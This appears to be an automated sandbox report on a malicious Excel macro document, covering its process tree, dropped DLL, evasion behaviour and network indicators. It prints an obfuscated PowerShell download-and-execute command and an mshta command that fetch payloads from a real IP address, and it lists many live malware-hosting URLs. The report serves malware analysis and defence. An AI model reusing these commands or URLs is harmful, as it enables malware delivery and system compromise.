                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F08CC push 8B4902E0h; iretd 4_3_032F08D1
                            Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F00C2 push 8B4902E0h; iretd 4_3_032F00C8
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8ba6a
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
                            Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 2548 Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000C.00000002.551291217.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B7E00 FindFirstFileW,16_2_002B7E00
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E4087 mov eax, dword ptr fs:[00000030h] 9_2_002E4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314087 mov eax, dword ptr fs:[00000030h] 10_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00784087 mov eax, dword ptr fs:[00000030h] 11_2_00784087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00224087 mov eax, dword ptr fs:[00000030h] 12_2_00224087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00314087 mov eax, dword ptr fs:[00000030h] 15_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002C4087 mov eax, dword ptr fs:[00000030h] 16_2_002C4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC

                            HIPS / PFW / Operating System Protection Evasion

                            Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 160.16.102.168 80
                            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
                            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
                            Source: Yara match | File source: NZW-010122 BNUV-280122.xlsm, type: SAMPLE
                            Source: Yara match | File source: C:\Users\user\Desktop\NZW-010122 BNUV-280122.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003F570 GetLocaleInfoA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10043730 GetThreadLocale,GetLocaleInfoA,GetACP
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10014B71 _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_1003F570 GetLocaleInfoA
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10043730 GetThreadLocale,GetLocaleInfoA,GetACP
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10014B71 _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003DAA7 cpuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson
                            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA

                            Stealing of Sensitive Information

Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 15 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 123 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 21 Masquerading | LSA Secrets | 21 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 111 Process Injection | DCSync | 2 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
Behavior Graph ID: 562386
Sample: NZW-010122 BNUV-280122.xlsm; Startdate: 28/01/2022; Architecture: WINDOWS; Score: 100
DNS/IP info (sample level): 129.232.188.93 (xneeloZA, South Africa); 162.214.50.39 (UNIFIEDLAYER-AS-1US, United States); 42 other IPs or domains
Signatures (sample level): Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Antivirus detection for URL or domain; 14 other signatures
Process tree:
EXCEL.EXE (started)
  dropped file: C:\Users\...\~$NZW-010122 BNUV-280122.xlsm, data
  cmd.exe (started)
    mshta.exe (started)
      DNS/IP info: 91.240.118.172, 49167, 49168, 80 (GLOBALLAYERNL, unknown)
      powershell.exe (started)
        DNS/IP info: weezual.fr 213.186.33.4, 49169, 80 (OVHFR, France); mycloud.suplitecmo.com 51.81.152.36, 49170, 80 (OVHFR, United States)
        dropped file: C:\ProgramData\JooSee.dll, PE32
        signature: Powershell drops PE file
        cmd.exe (started)
          rundll32.exe (started)
            rundll32.exe (started)
              dropped file: C:\Windows\SysWOW64\...\pcrxj.oyh (copy), PE32
              signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
              rundll32.exe (started)
                rundll32.exe (started)
                  signature: Hides that the sample has been downloaded from the Internet (zone.identifier)
                  rundll32.exe (started)

                            No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| C:\ProgramData\JooSee.dll | 100% | Joe Sandbox ML | | |
                            No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| mycloud.suplitecmo.com | 51.81.152.36 | true | false | | unknown |
| weezual.fr | 213.186.33.4 | true | false | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
| http://weezual.fr/ju9c/twEHJDCvNwGimD/ | true | Avira URL Cloud: malware | unknown |
| http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ | true | Avira URL Cloud: malware | unknown |
| http://91.240.118.172/cc/vv/fe.png | true | Avira URL Cloud: malware | unknown |
| http://91.240.118.172/cc/vv/fe.html | true | Avira URL Cloud: malware | unknown |
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://91.240.118.172/cc/vv/fe.htmlTmshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crl.entrust.net/server1.crl0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://lambayeque.apiperu.net.pe/assets/whnYzDBLH/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://mycloud.suplitecmo.compowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://stancewheels.com/wp-admin/bbL1MAzNvohHH/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://weezual.frpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://91.240.118.172/cc/vv/fe.htmlBNZW-010122 BNUV-280122.xls.0.drtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://danahousecare.com/wp-content/cache/nAZV1f5Bh9CFmBtl2J/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://sep.dfwsopowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://91.240.118.172powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://160.16.102.168/rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://michaelcrompton.co.uk/wp-powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.protware.commshta.exe, 00000004.00000003.420721916.0000000003C80000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://160.16.102.168:80/AUhFYYAjKIJrundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://lambayeque.apiperu.net.ppowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://weezual.fpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://weezual.fr/ju9c/twEHJDCvNpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.belajarngaji.shop/wp-admin/zVhSqHo7Fi2ulNeN1/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://michaelcrompton.co.uk/wp-admin/G/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://michaelcrompton.co.uk/wp-admin/G/PEpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://91.240.118.172/cc/vv/fe.htmlymshta.exe, 00000004.00000003.420780191.00000000003B8000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://chupahfashion.com/eh6bwxkpowershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.piriform.com/ccleanerpowershell.exe, 00000006.00000002.676609575.000000000028B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://91.240.118.172/cc/vv/fe.ppowershell.exe, 00000006.00000002.679989773.0000000003641000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://chupahfashion.com/eh6bwxk/bowptl/F2sib90zZsqJ44/bQ8VXS/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://91.240.118.172/cc/vv/fe.htmlhttp://91.240.118.172/cc/vv/fe.htmlmshta.exe, 00000004.00000003.422354344.0000000002DF5000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://secure.comodo.com/CPS0rundll32.exe, 00000010.00000002.677004385.000000000058A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.entrust.net/2048ca.crl0rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://firstfitschool.com/83wg6z/9TRIk5HsoTQiiVWoX/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://hekmat20.com/wp-includes/7/powershell.exe, 00000006.00000002.680618070.0000000003795000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://91.240.118.172/cc/vv/fe.htmlimshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://91.240.118.172/cc/vv/fe.htmlngsmshta.exe, 00000004.00000002.437253347.000000000036E000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562386
Start date: 28.01.2022
Start time: 20:38:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 16s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: NZW-010122 BNUV-280122.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@21/12@2/48
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 21.2% (good quality ratio 17.8%)
• Quality average: 65.1%
• Quality standard deviation: 33.2%
HCA Information:
